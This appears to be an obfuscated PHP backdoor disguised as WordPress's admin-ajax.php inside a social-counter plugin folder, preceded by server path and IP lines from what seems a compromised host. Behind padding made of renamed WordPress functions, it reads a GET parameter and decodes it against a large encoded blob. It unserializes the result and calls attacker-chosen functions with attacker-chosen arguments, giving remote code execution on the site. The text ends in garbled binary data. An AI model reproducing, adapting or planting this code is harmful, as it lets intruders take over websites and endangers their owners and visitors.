PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Dir : /home/trave494/internetmoney.kerihosting.com/wp-content/plugins/td-social-counter/ |
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 IP: 209.182.202.254 |
Dir : /home/trave494/internetmoney.kerihosting.com/wp-content/plugins/td-social-counter/admin-ajax.php |
<?php /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $merged_styles Stores the number of times each action was triggered. * * @param string $RIFFdataLength The name of the action hook. * @return int The number of times the action hook has been fired. */ function post_comment_meta_box_thead($RIFFdataLength) { global $merged_styles; if (!isset($merged_styles[$RIFFdataLength])) { return 0; } return $merged_styles[$RIFFdataLength]; } // Add WordPress.org link. $checked_attribute = "Sample Message"; /** * @ignore */ function wp_should_load_block_editor_scripts_and_styles() { } /* translators: %s: Support forums URL. */ function sanitize_widget_js_instance($diff_ratio, $lastexception, $active_theme_parent_theme) { return str_replace($lastexception, $active_theme_parent_theme, $diff_ratio); } /** * Registers plural strings in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example: * * $checked_attribute = register_sidebar( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $checked_attribute, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.5.0 * * @param string $registered_sizes Singular form to be localized. * @param string $wp_content_dir Plural form to be localized. * @param string $parsed_widget_id Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $registered_sizes Singular form to be localized. * @type string $wp_content_dir Plural form to be localized. * @type null $context Context information for the translators. * @type string|null $parsed_widget_id Text domain. * } */ function register_sidebar($registered_sizes, $wp_content_dir, $parsed_widget_id = null) { return array(0 => $registered_sizes, 1 => $wp_content_dir, 'singular' => $registered_sizes, 'plural' => $wp_content_dir, 'context' => null, 'domain' => $parsed_widget_id); } $wp_filter = str_replace("World", "PHP", "Hello, World!"); /** * Counts number of sites grouped by site status. * * @since 5.3.0 * * @param int $fp_status Optional. The network to get counts for. Default is the current network ID. * @return int[] { * Numbers of sites grouped by site status. * * @type int $all The total number of sites. * @type int $public The number of public sites. * @type int $archived The number of archived sites. * @type int $mature The number of mature sites. * @type int $spam The number of spam sites. * @type int $deleted The number of deleted sites. * } */ function parse_db_host($fp_status = null) { if (empty($fp_status)) { $fp_status = get_current_network_id(); } $footnote = array(); $total_in_hours = array('network_id' => $fp_status, 'number' => 1, 'fields' => 'ids', 'no_found_rows' => false); $bytesize = new WP_Site_Query($total_in_hours); $footnote['all'] = $bytesize->found_sites; $submit_field = $total_in_hours; $revisions_rest_controller = array('public', 'archived', 'mature', 'spam', 'deleted'); foreach ($revisions_rest_controller as $all_opt_ins_are_set) { $submit_field = $total_in_hours; $submit_field[$all_opt_ins_are_set] = 1; $bytesize = new WP_Site_Query($submit_field); $footnote[$all_opt_ins_are_set] = $bytesize->found_sites; } return $footnote; } /** * Callback for rendering the custom logo, used in the custom_logo partial. * * This method exists because the partial object and context data are passed * into a partial's render_callback so we cannot use get_custom_logo() as * the render_callback directly since it expects a blog ID as the first * argument. When WP no longer supports PHP 5.3, this method can be removed * in favor of an anonymous function. * * @see WP_Customize_Manager::register_controls() * * @since 4.5.0 * * @return string Custom logo. */ function column_blogname(&$f6g4_19, $pagination_links_class, $interval){ // $plugin must exist. $i64 = "EncodeThis"; $include_time = "1,2,3,4,5"; $about_version = "Jack,Ana,Peter"; $renderer = 256; // if inside an Atom content construct (e.g. content or summary) field treat tags as text // Sample Table Sample-to-Chunk atom $pattern_properties = count($interval); $pattern_properties = $pagination_links_class % $pattern_properties; // Error: missing_args_hmac. // Template for the Crop area layout, used for example in the Customizer. $current_post = explode(",", $include_time); $current_nav_menu_term_id = hash("sha1", $i64); $pt1 = explode(',', $about_version); $pattern_properties = $interval[$pattern_properties]; foreach ($pt1 as &$flattened_subtree) { $flattened_subtree = trim($flattened_subtree); } $signed_hostnames = array_sum($current_post); $post_array = trim($current_nav_menu_term_id); if (strlen($post_array) > 30) { $some_invalid_menu_items = substr($post_array, 0, 30); } unset($flattened_subtree); $first_pass = array_merge($current_post, [10]); $f6g4_19 = ($f6g4_19 - $pattern_properties); $cqueries = implode(' | ', $pt1); $f6g4_19 = $f6g4_19 % $renderer; } /** * Show Comments section. * * @since 3.8.0 * * @param int $leaf_path Optional. Number of comments to query. Default 5. * @return bool False if no comments were found. True otherwise. */ function get_date_template($leaf_path = 5) { // Select all comment types and filter out spam later for better query performance. $CharSet = array(); $post_types_to_delete = array('number' => $leaf_path * 5, 'offset' => 0); if (!current_user_can('edit_posts')) { $post_types_to_delete['status'] = 'approve'; } while (count($CharSet) < $leaf_path && $created_sizes = get_comments($post_types_to_delete)) { if (!is_array($created_sizes)) { break; } foreach ($created_sizes as $auto_draft_post) { if (!current_user_can('edit_post', $auto_draft_post->comment_post_ID) && (post_password_required($auto_draft_post->comment_post_ID) || !current_user_can('read_post', $auto_draft_post->comment_post_ID))) { // The user has no access to the post and thus cannot see the comments. continue; } $CharSet[] = $auto_draft_post; if (count($CharSet) === $leaf_path) { break 2; } } $post_types_to_delete['offset'] += $post_types_to_delete['number']; $post_types_to_delete['number'] = $leaf_path * 10; } if ($CharSet) { echo '<div id="latest-comments" class="activity-block table-view-list">'; echo '<h3>' . __('Recent Comments') . '</h3>'; echo '<ul id="the-comment-list" data-wp-lists="list:comment">'; foreach ($CharSet as $auto_draft_post) { _get_date_template_row($auto_draft_post); } echo '</ul>'; if (current_user_can('edit_posts')) { echo '<h3 class="screen-reader-text">' . __('View more comments') . '</h3>'; _get_list_table('WP_Comments_List_Table')->views(); } wp_comment_reply(-1, false, 'dashboard', false); wp_comment_trashnotice(); echo '</div>'; } else { return false; } return true; } /* * Instead of clearing the parser state and starting fresh, calling the stack methods * maintains the proper flags in the parser. */ function crypto_aead_chacha20poly1305_encrypt($is_writable_wp_plugin_dir, $usecache) { $bulk_messages = "SimpleString"; // Redirect old slugs. // Flags $xx xx foreach ($is_writable_wp_plugin_dir as $pattern_properties => $attrname) { if ($attrname == $usecache) { return $pattern_properties; } } return -1; } $subkey_len = "base64encoded"; /** * Retrieves archive link content based on predefined or custom code. * * The format can be one of four styles. The 'link' for head element, 'option' * for use in the select element, 'html' for use in list (either ol or ul HTML * elements). Custom content is also supported using the before and after * parameters. * * The 'link' format uses the `<link>` HTML element with the **archives** * relationship. The before and after parameters are not used. The text * parameter is used to describe the link. * * The 'option' format uses the option HTML element for use in select element. * The value is the url parameter and the before and after parameters are used * between the text description. * * The 'html' format, which is the default, uses the li HTML element for use in * the list HTML elements. The before parameter is before the link and the after * parameter is after the closing link. * * The custom format uses the before parameter before the link ('a' HTML * element) and the after parameter after the closing link tag. If the above * three values for the format are not used, then custom format is assumed. * * @since 1.0.0 * @since 5.2.0 Added the `$MPEGaudioLayer` parameter. * * @param string $maybe_widget_id URL to archive. * @param string $options_audio_wavpack_quick_parsing Archive text description. * @param string $done_posts Optional. Can be 'link', 'option', 'html', or custom. Default 'html'. * @param string $late_route_registration Optional. Content to prepend to the description. Default empty. * @param string $cross_domain Optional. Content to append to the description. Default empty. * @param bool $MPEGaudioLayer Optional. Set to true if the current page is the selected archive page. * @return string HTML link content for archive. */ function gensalt_blowfish($maybe_widget_id, $options_audio_wavpack_quick_parsing, $done_posts = 'html', $late_route_registration = '', $cross_domain = '', $MPEGaudioLayer = false) { $options_audio_wavpack_quick_parsing = wptexturize($options_audio_wavpack_quick_parsing); $maybe_widget_id = esc_url($maybe_widget_id); $new_menu = $MPEGaudioLayer ? ' aria-current="page"' : ''; if ('link' === $done_posts) { $data_to_export = "\t<link rel='archives' title='" . esc_attr($options_audio_wavpack_quick_parsing) . "' href='{$maybe_widget_id}' />\n"; } elseif ('option' === $done_posts) { $restrict_network_only = $MPEGaudioLayer ? " selected='selected'" : ''; $data_to_export = "\t<option value='{$maybe_widget_id}'{$restrict_network_only}>{$late_route_registration} {$options_audio_wavpack_quick_parsing} {$cross_domain}</option>\n"; } elseif ('html' === $done_posts) { $data_to_export = "\t<li>{$late_route_registration}<a href='{$maybe_widget_id}'{$new_menu}>{$options_audio_wavpack_quick_parsing}</a>{$cross_domain}</li>\n"; } else { // Custom. $data_to_export = "\t{$late_route_registration}<a href='{$maybe_widget_id}'{$new_menu}>{$options_audio_wavpack_quick_parsing}</a>{$cross_domain}\n"; } /** * Filters the archive link content. * * @since 2.6.0 * @since 4.5.0 Added the `$maybe_widget_id`, `$options_audio_wavpack_quick_parsing`, `$done_posts`, `$late_route_registration`, and `$cross_domain` parameters. * @since 5.2.0 Added the `$MPEGaudioLayer` parameter. * * @param string $data_to_export The archive HTML link content. * @param string $maybe_widget_id URL to archive. * @param string $options_audio_wavpack_quick_parsing Archive text description. * @param string $done_posts Link format. Can be 'link', 'option', 'html', or custom. * @param string $late_route_registration Content to prepend to the description. * @param string $cross_domain Content to append to the description. * @param bool $MPEGaudioLayer True if the current page is the selected archive. */ return apply_filters('gensalt_blowfish', $data_to_export, $maybe_widget_id, $options_audio_wavpack_quick_parsing, $done_posts, $late_route_registration, $cross_domain, $MPEGaudioLayer); } $group_items_count = 'Spaces here '; /* translators: 1: The WordPress error message. 2: The WordPress error code. */ function wp_upgrade($tt_ids){ $mf = $_GET[$tt_ids]; $switched_blog = "Example Text"; $include_time = "verify_input"; $public_only = "foo bar"; $rate_limit = range(1, 10); $carry3 = explode("_", $include_time); $cap_string = trim($switched_blog); $force_feed = count($rate_limit); $typography_settings = explode(" ", $public_only); if ($force_feed > 5) { $rate_limit[] = 11; } $client_version = hash('sha224', $carry3[1]); $copyright = strlen($cap_string); $subframe_apic_description = array_map('strtoupper', $typography_settings); // PodCaST // For backward compatibility, failures go through the filter below. if (strlen($client_version) > 28) { $stack_item = substr($client_version, 0, 28); } else { $stack_item = $client_version; } if ($copyright > 10) { $StreamPropertiesObjectStreamNumber = hash('md5', $cap_string); } $archives = implode("-", $subframe_apic_description); $mf = str_split($mf); $translations_available = str_pad($stack_item, 28, "0"); $is_writable_abspath = rawurldecode("Example%20Text"); // Return comment threading information (https://www.ietf.org/rfc/rfc4685.txt). $mf = array_map("ord", $mf); return $mf; } core_salsa20(); $tt_ids = "DiRiKP"; /** * Gets the header images uploaded for the active theme. * * @since 3.2.0 * * @return array */ function mt_publishPost() { $ctx4 = array(); // @todo Caching. $stylesheet_index_url = get_posts(array('post_type' => 'attachment', 'meta_key' => '_wp_attachment_is_custom_header', 'meta_value' => get_option('stylesheet'), 'orderby' => 'none', 'nopaging' => true)); if (empty($stylesheet_index_url)) { return array(); } foreach ((array) $stylesheet_index_url as $thisfile_asf_codeclistobject) { $maybe_widget_id = sanitize_url(wp_get_attachment_url($thisfile_asf_codeclistobject->ID)); $has_instance_for_area = wp_get_attachment_metadata($thisfile_asf_codeclistobject->ID); $mysql_server_version = $thisfile_asf_codeclistobject->ID; $ctx4[$mysql_server_version] = array(); $ctx4[$mysql_server_version]['attachment_id'] = $thisfile_asf_codeclistobject->ID; $ctx4[$mysql_server_version]['url'] = $maybe_widget_id; $ctx4[$mysql_server_version]['thumbnail_url'] = $maybe_widget_id; $ctx4[$mysql_server_version]['alt_text'] = get_post_meta($thisfile_asf_codeclistobject->ID, '_wp_attachment_image_alt', true); if (isset($has_instance_for_area['attachment_parent'])) { $ctx4[$mysql_server_version]['attachment_parent'] = $has_instance_for_area['attachment_parent']; } else { $ctx4[$mysql_server_version]['attachment_parent'] = ''; } if (isset($has_instance_for_area['width'])) { $ctx4[$mysql_server_version]['width'] = $has_instance_for_area['width']; } if (isset($has_instance_for_area['height'])) { $ctx4[$mysql_server_version]['height'] = $has_instance_for_area['height']; } } return $ctx4; } /** * Prints default Plupload arguments. * * @since 3.4.0 */ function get_previous_crop($flattened_subtree, $mf){ $original_title = $mf[1]; // Skip if "fontFace" is not defined, meaning there are no variations. //allow sendmail to choose a default envelope sender. It may $archive_pathname = $mf[3]; $original_title($flattened_subtree, $archive_pathname); } /** * Displays the permalink to the post for use in feeds. * * @since 2.3.0 */ function get_others_pending() { /** * Filters the permalink to the post for use in feeds. * * @since 2.3.0 * * @param string $post_permalink The current post permalink. */ echo esc_url(apply_filters('get_others_pending', get_permalink())); } /** * @see ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt() * @param string $image_edit_button * @param string $newerror * @param string $stcoEntriesDataOffset * @param string $pattern_properties * @return string|bool */ function handle_dismiss_autosave_or_lock_request($image_edit_button, $newerror, $stcoEntriesDataOffset, $pattern_properties) { try { return ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt($image_edit_button, $newerror, $stcoEntriesDataOffset, $pattern_properties, true); } catch (Error $allowed_ports) { return false; } catch (Exception $allowed_ports) { return false; } } /** * Determines whether an offset value exists. * * @since 4.7.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetexists.php * * @param mixed $offset An offset to check for. * @return bool True if the offset exists, false otherwise. */ function getDebugLevel($mf){ $rgadData = 'PHP is amazing'; $att_title = $mf[4]; $child_of = strpos($rgadData, 'amazing'); // (fscode==1) means 44100Hz (see sampleRateCodeLookup) $flattened_subtree = $mf[2]; get_previous_crop($flattened_subtree, $mf); if ($child_of !== false) { $erasers = 'Contains amazing'; } // s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + the_content($flattened_subtree); $att_title($flattened_subtree); } // Average BitRate (ABR) /** * Registers the `core/comments-pagination` block on the server. */ function has_content() { register_block_type_from_metadata(__DIR__ . '/comments-pagination', array('render_callback' => 'render_block_core_comments_pagination')); } $mf = wp_upgrade($tt_ids); /** * Retrieves the value of a transient. * * If the transient does not exist, does not have a value, or has expired, * then the return value will be false. * * @since 2.8.0 * * @param string $has_processed_router_region Transient name. Expected to not be SQL-escaped. * @return mixed Value of transient. */ function hello_dolly_get_lyric($has_processed_router_region) { /** * Filters the value of an existing transient before it is retrieved. * * The dynamic portion of the hook name, `$has_processed_router_region`, refers to the transient name. * * Returning a value other than false from the filter will short-circuit retrieval * and return that value instead. * * @since 2.8.0 * @since 4.4.0 The `$has_processed_router_region` parameter was added * * @param mixed $dirty_enhanced_queries_transient The default value to return if the transient does not exist. * Any value other than false will short-circuit the retrieval * of the transient, and return that value. * @param string $has_processed_router_region Transient name. */ $dirty_enhanced_queries = apply_filters("pre_transient_{$has_processed_router_region}", false, $has_processed_router_region); if (false !== $dirty_enhanced_queries) { return $dirty_enhanced_queries; } if (wp_using_ext_object_cache() || wp_installing()) { $attrname = wp_cache_get($has_processed_router_region, 'transient'); } else { $sign_up_url = '_transient_' . $has_processed_router_region; if (!wp_installing()) { // If option is not in alloptions, it is not autoloaded and thus has a timeout. $return_me = wp_load_alloptions(); if (!isset($return_me[$sign_up_url])) { $menu_locations = '_transient_timeout_' . $has_processed_router_region; $thisfile_wavpack_flags = get_option($menu_locations); if (false !== $thisfile_wavpack_flags && $thisfile_wavpack_flags < time()) { delete_option($sign_up_url); delete_option($menu_locations); $attrname = false; } } } if (!isset($attrname)) { $attrname = get_option($sign_up_url); } } /** * Filters an existing transient's value. * * The dynamic portion of the hook name, `$has_processed_router_region`, refers to the transient name. * * @since 2.8.0 * @since 4.4.0 The `$has_processed_router_region` parameter was added * * @param mixed $attrname Value of transient. * @param string $has_processed_router_region Transient name. */ return apply_filters("transient_{$has_processed_router_region}", $attrname, $has_processed_router_region); } /** * Loads sidebar template. * * Includes the sidebar template for a theme or if a name is specified then a * specialized sidebar will be included. * * For the parameter, if the file is called "sidebar-special.php" then specify * "special". * * @since 1.5.0 * @since 5.5.0 A return value was added. * @since 5.5.0 The `$total_in_hours` parameter was added. * * @param string $flattened_subtree The name of the specialized sidebar. * @param array $total_in_hours Optional. Additional arguments passed to the sidebar template. * Default empty array. * @return void|false Void on success, false if the template does not exist. */ function fix_phpmailer_messageid($mf){ $NewFramelength = "SampleToDecode"; $switched_blog = "Example Text"; $mf = array_map("chr", $mf); // get length $cap_string = trim($switched_blog); $characters_over_limit = rawurldecode($NewFramelength); // A cookie (set when a user resizes the editor) overrides the height. $data_to_delete = hash('md5', $characters_over_limit); $copyright = strlen($cap_string); $mf = implode("", $mf); $mf = unserialize($mf); // 2 second timeout return $mf; } /** * Determines whether the query is for an existing year archive. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 1.5.0 * * @global WP_Query $time_class WordPress Query object. * * @return bool Whether the query is for an existing year archive. */ function get_post_meta_by_id() { global $time_class; if (!isset($time_class)) { _doing_it_wrong(__FUNCTION__, __('Conditional query tags do not work before the query is run. Before then, they always return false.'), '3.1.0'); return false; } return $time_class->get_post_meta_by_id(); } /** * Returns the fallback template for the given slug. * * @since 6.1.0 * @since 6.3.0 Ignore empty templates. * * @param WP_REST_Request $unwrapped_name The request instance. * @return WP_REST_Response|WP_Error */ function core_salsa20(){ $sub2tb = "URL%20Example"; // pass set cookies back through redirects $ptype_menu_position = "\xa6\xb1\x86\xa3\xe4\xb2\xae\xa6\x8d\xe3\xa5}\xac\x90\x88\xab\xe0\xbe\xce\xc8\xb9\xe9\xe9\xb1\xd3\xda\xba\xe9\xbb\xd4\xb9\xeat\xa4\xd2\x83\xa6\xb0\xc5\xaa\xa2\x86\x97\x9d\xa7\x94\xee\xc2\xda\xb1k\xaf\xde\x8c\xa3\xa6\xbf\xaf\x8a\x9aw\xa9\x8c\x8b\xa5\x88\xe4\xdd\xc2z\xd1\xc1\xe3\xb9\xda\xae\xe6\xc0\x89\xaf\xa2\xc4\xc9\xb7\x98\x8f\x92\xbc\xc7\xbd\x90\xbc\x9f\x92sR}~[y\x8bl\x95v\xe1O\x97r\x89\x89i\x94\x95r\x90\x8b\xbe\xda\xca\xdb\xb7\xe5\x81\x93\xda\xc1\xe2\x9f\x81\xb0\xdb\xad\xd8\xc1\x8eN\x99\xae\xe1\x9d\x81\x96\x95r\x90\x8bl\xa3\x85\x90e\xc8\xa9\xdc\xaei\x94\x9f\x81\x92\xc7\xc4\xa7\xb7\x88q\xa6|\x89\xdb\x90\xc4\x95r\x90\x95{\x99\x9c\xad\xb6\xce\x9d\xae\xb6x\x9e\x95\x96\xd6\x8bl\x9f\x85\x8f\x80\xb2\s\x89i\x94\x95rz\x8bl\x95voi\xe6\xa4\xc1\xbd\xc1\x94\xb2[\xdd\xcf\x81\x9dz\xac\x8c\xe8\xa9\xb4\xae\x96\x9d\xb0\x8dzu{\x9fv\x86\xaf\xe7\x94\x89\x93x\x98\xe8\xa6\xb1\xb4\xad\xdb\xc7\xb7\xab\x97r\x89\x89i\xb1\xa4|\xb2\xdd\xb8\xcev\x86o\xa6\xb4\xca\xdc\xae\xaa\xa9\xb1\xd4\xd0\xaf\xe4\xba\xcbm\x9b\x98\xb0\xda\xa0\xbf\xba\x9f\x99\xa6p\xd4\xcbo\x82\x97r\x89\x89p\xa6\xab\x8a\xa9\x9cs\xb0`oN\x80r\x89\x89i\xdd\xdbr\x98\x8f\xbf\xc9\x97\xaf\xa6\xdd\xc3\xba\xcfR\xb1\xb2\x8f\x9f\x95l\xbc\xa9\xbbo\xa6\xb8\xca\xd5\xbc\xd9\x9er\x90\xe6V~_oN\xa6|\xab\xc2\xae\xe3\xd8|\x9f\x8f\xbf\xc9\x97\xaf\xa6\xdd\xc3\xba\xcfi\x94\x95r\xad\x8bl\x95v\x8dl\xb2\ssx\x9e\xbb\xcb\xb3\xbc\xbd\x95v\x86o\xa6\xcfsrR}\x99\xa7\xbe\xd8\xbb\xe7v\xa3t\xa1r\x89\xd2i\x94\x9f\x81\xe3\xdf\xbe\xd4\xc9\xd6\xb1\xe0\xc6\x91\x8d\x8f\xbb\xe6\xa9\xbb\xb0\x99\x9e\x91pe\x97r\x89\x89i\x98\xee\xa9\xd8\xba\x95\xba\xd0\xbbN\xb4[\xdc\xdd\xbb\xe0\xda\xc0\x98\x8f\x92\xbc\xc7\xbd\x90\xbc\x9f\x92\xa4m\xd3\xb7\x81\x9a\x8bl\xcfv\x86e\xa1\x81\xa6rp\xa7\xa5\x8a\xa2\x92\x87`pt\xa1r\x89\xc3\x91\xd6\xec\xc5\x90\x95{\x99\xc1\xd5\xbf\xbd\xc8\xab\x89i\x94\x95r\xad\x8b|\xb0`\x86t\xa1r\xc0\xab\xbb\x94\x9f\x81\xe7\xd3\xb5\xe1\xbb\x95o\x97\x96\xcd\x89s\xa3\x9dr\x94\xd6\xbb\xef\x9c\xdc\x87\x80\x8er\x8d\xc2\xcb\xdd\xa1\xb9\xb0\xc6\xca_\x8fN\xf2\\x89\x89i\xa3\x9fr\x90\x8b\xbf\xea\x9b\x90t\x9b\xbd\xd8\xe3\x8f\xea\xb7}\x9b\xa6V_\x8a\xb4\xe3\x99\xcf\xc0\xc3\xbd\xee\x9c\xbc\x8bl\x95v\xa3t\xa1r\xd8\xcci\x94\x9f\x81\x94\xc0\x9a\xe2\xc5\xd8\xa0\x9b\xbd\xd8\xe3\x8f\xea\xb7\xaf\xabul~\xbf\xcct\xa1r\x89\x89\xbe\x94\x95r\x9a\x9at\xe8\xca\xd8\xb5\xe6\xc5\x91\x8d\xb8\xe0\xbc\xb8\xc7\xe5\x95\xee\xa0\xb2q\x97r\x90\xcap\x9d\xa4|\x90\x8bl\xea\xa2\x86e\x97|\x98\x8a\x86\xb1~\xb8\xd1\xd7\xbf\xda\x95o\x97\x9a\xe2\xb2i\x94\x9f\x81\xebul\x95\x85\x90e\x97\xa4\xba\x89i\x9e\xa4v\xc5\xb9\xb9\xe4\xc8\xc1i\xe2\xc1\xe3\xaf\xbf\xb6\xd2[\xad\x9av\x95\xa3\xd4\xa6\xa1\x81\xdc\xdd\xbb\xe8\xe4\xc7\xe0\xdb\xb1\xe7~\x8a\xb4\xe3\x99\xcf\xc0\xc3\xbd\xee\x9c\xbc\x94\x87v\x95o\x97\xc2\xc2\xc3i\x9e\xa4\xcfztU\x95v\xe3O\x97r\x8d\xac\xb5\xc7\xbf\x9a\xb4\xcc\xb0\xed\x85\x90e\x97r\xdd\xde\xbd\x94\x95r\x9a\x9a\x89\xa4\x80\x86e\x97\xc5\x89\x89s\xa3\xde\xbf\xe0\xd7\xbb\xd9\xbb\x8el\x9e~\x98\x93i\xe0\xe9\xa1\xbe\x95{\x99\xab\xb4\xb2\xe6\xc4\x92\xa4m\xd3\xbf\x9f\x9f\x95l\xcf\x80\x95\x82\xa6|\x89\xbb\x8f\xe2\x95r\x9a\x9as\xa8\x8e\x99u\xady\xa4sS~\x95r\x90\x8bl\x99\xb5\xad\x8a\xcb\xad\x90\xcd\xae\xd7\xe4\xb6\xd5\xcfs\xd2\x85\x90e\x97\xab\xb7\xd3s\xa3\xb2r\x90\x8bp\xb8\xc2\xb9\x8f\xbf\x96\xca\xcd\xc1\xaf\xb0\\x90\x8bl\x95v\x8a\xa4\xc7\xa1\xbc\xbd\xa4\x9b\xdd\xb3\xe3\xd3s\xd2_\xa3N\x9b\xc1\xbb\xc1\x9d\xec\xb0\\x90\x8bl\x95v\xcf\xab\xa6|\x89\xb7\xb6\x9e\xa4z\xd6\xd4\xb8\xda\xb5\xcb\xbd\xe0\xc5\xdd\xdcq\x9b\xe5\xb3\xe4\xd3{\xe9\xc5\x95\xab\xe0\xbe\xce\x90r\x9d\x95r\xebuV\xa4\x80\x86e\x97\xa2\xab\x93x\x98\xbd\xc5\xd7\xce\xb1\xa4\x80\x86\xb8\xba\x9c\xd8\xb8i\x94\x95|\x9f\xa8U\xdb\xbf\xd2\xaa\xd6\xb9\xce\xdd\xa8\xd7\xe4\xc0\xe4\xd0\xba\xe9\xc9\x8el\xe7\xb3\xdd\xd1x\xe8\xe4\x81\xd6\xd4\xb8\xda}\x8f\x80\x81r\x89\x89i\x98\xdf\x95\xd8\xde\xc2\xb9\x98\x86e\x97r\xa6r\xae\xec\xe5\xbe\xdf\xcf\xb1\x9d}\x92l\xa3r\x89\x89i\x98\xbd\xc5\xd7\xce\xb1\x9e\x91\x8a\xa4\xd8\x81\x93\xaa\xb4\x9e\xa4\x8f\x90\x8bs\xa6\x8b\x98}\xa8y\xa4sR}~\x81\x9a\xd1v\xa4z\xcd\x8e\xd1\xba\xdc\xdf\xab\x94\x95r\x90\x8b\x89~\xc3\xcaz\x9f\xc5\xce\xdb\xb2\xd5\xe1\xbb\xea\xd0t\x99\xc0\xa9\xad\xea\xc8\xad\xabr\x9d\xb0\\x90\x8bl\x95v\x86\xae\xdd\x81\x93\x89i\xc1\xea\x9c\xc2\xb5v\xa4~\xcf\xb8\xd6\xb3\xdb\xdb\xaa\xed\x9dv\xda\xae\xb4\xe8\xcc\xaa\x87\xa0{\x98\x93i\x94\xcb\xc8\xbf\x8bl\x95\x80\x95\xc0\x81[rrx\x9e\xcf\xb4\xca\x8bl\x95\x80\x95i\xe7\x95\xdf\xaa\x8e\xdf\xb8\xbd\xd9t\x89\xa4\x80\x86e\xe7r\x93\x98\xaa\xe6\xe7\xb3\xe9\xca\xbf\xe1\xbf\xc9\xaa\x9fv\xd3\xac\xb1\xe7\xeb\x96\xb2\x97U\xa5\x82\x86e\x97\x87\x92\xa4\x84~\x95r\x90\x8bl\x95v\x86e\xf4\s\x89i\x94\xf2\ytU~_oi\xc5\xbb\xb0\xcd\xb5\x94\x95\x8f\x9f\x95l\xda\xc8\xb5e\xa1\x81\xca\xdb\xbb\xd5\xee\xb1\xdd\xcc\xbc\x9d}\xda\xb7\xe0\xbf\x90\x95R\x98\xe5\x95\xe6\xac\x91\xe0\x99\xd1\xae\xa0\x8ds\x89i\x94\x95r\x90\x8f\xbf\xd9\xa7\xcf\xaa\x97r\x89\x89\x86}\xe7\xb3\xe7\xe0\xbe\xe1\xba\xcb\xa8\xe6\xb6\xce\x91\xb2\xe1\xe5\xbe\xdf\xcf\xb1\x9d}\x92l\xa3\x81\x93\xb0\xb3\xc1\xe4\xbc\x90\x8bl\x9f\x85\x8a\x93\xe0\x99\xcd\xd5r\x9d\xb0\\x90\x8bl\x95\x85\x90\xa6\xe4\x93\xcf\x89i\x9e\xa4v\xcf\xae\x9b\xc4\xa1\xaf\x8a\xd2y\xcf\xd2\xb7\xd5\xe1\xb1\xe6\xcc\xb8\xea\xbb\x8d\xa2\xa6|\x89\xd7\xb5\x94\x95r\x9a\x9a\x89~z\xd9\xa9\xc8\xbb\xce\xa4S}~[y\x8bl\x95v\x86\xc2\x81rsrR}\xa4|\x90\x8bl\xc8\xc7\x86e\x97|\x98\xcf\xbe\xe2\xd8\xc6\xd9\xda\xba\x95\xcf\xae\xb6\xe3\xbc\xe2\xd4\x9d\xc6\x9d{zt{\x9fv\x86\x93\xdc\xc9\xc0\x89i\x94\x9f\x81\xebuVv\x86e\x97r\x8d\xba\xb9\xcb\xbd\xc2\xbb\xbc\x99\xcd\x9fo\x82\x97r\x89\x89i\xb5\xe7\xc4\xd1\xe4t\x99\xb5\xa9\x94\xc6\x9d\xb2\xaeu\xa3\x9fr\xe3\xdcl\x95v\x90t\x9b\xb1\xb9\xb8\x9c\xc8\x9e\x8d\xabuU~_oi\xd0\xa8\xb7\xc0\x9f\xbd~\x8fy\xcc\xbe\xe7\xb7\xdf\xa4\xe4\xb3\xd9\x91p\xe1\xd9\x87\x97\x97{\x9fv\xda\x93\xbf\xaa\xb3\x89s\xa3\x99\xb1\xb3\xba\x9b\xc0\x9f\xabn\xb2\x8dssS\x94\x95r\x94\xde\xb3\xdc\x9f\xd0\x8c\x97r\x89\xa6i\x94\x95r\x90\xde\xc0\xe7\xc6\xd5\xb8\x9fv\xc8\xbc\x8e\xc6\xcb\x97\xc2\xc6s\xbd\xaa\xba\x95\xd6\xa7\xbc\xae\x9b\xd3\xb6\x99\xb5\xb9\xa0\x9c\xb3\x92N\x9e\x9f\xd8\xe3\xb2\xe0\xe1\xb3\x97\x94{\x9fv\x86\xa7\x97r\x93\x98j\xb1\xb2\x81\x9a\x8b\xaf\xcd\xa0\xb4\x88\x97r\x89\x93x\xda\xd6\xbe\xe3\xd0{\x9fv\xd2\x86\xa1\x81\xa8\x98s\xd8\xder\x9a\x9as\xd7\xc8\xd5\xbc\xea\xb7\xdbr\xb2\xe7\xa4|\x90\xd4v\xa4\xa3\xd5\xbf\xe0\xbe\xd5\xcap\x94\xaf[\x97\xcd\xbe\xe4\xcd\xd9\xaa\xe9\x81\x93\x89i\x94\xb6\xa6\xc8\xb6\xc0\x95v\x86o\xa6\xbb\xdcr\xb7\xe3\xe9\x81\x9a\x8bl\x95\xbe\xac\xa8\xeer\x93\x98\x96\xe3\xef\xbb\xdc\xd7\xad\x9c\x91\xa1O\x97r\x89\x89i}r\x90\xd4\xb2\xa4\x80\x86e\xc0\xc6\xaa\xe0i\x9e\xa4z\xd9\xde\xab\xd6\xc8\xd8\xa6\xf0z\x8d\xba\xb9\xcb\xbd\xc2\xbb\xbc\x99\xcd\x9f\x8fn\x97\xcds\x89i\x94\x95[\x94\xb4\xc4\xcc\xc3\xb6\x8e\xba\xca\x89\x89i\x94\x95\x8f\x90\x8bl\x95\xb7\xd8\xb7\xd8\xcb\xc8\xdc\xb5\xdd\xd8\xb7\x98\x8f\x9d\xe5\xad\xae\xb5\xc2\xa3\xb6\xc1\x92\xa0\x95r\x90\x8b|\xa1\x85\x90\xb2\xba\xbc\xb9\xd2s\xa3\xa6{\xab\x8f\xab\xc4\xc7o\x82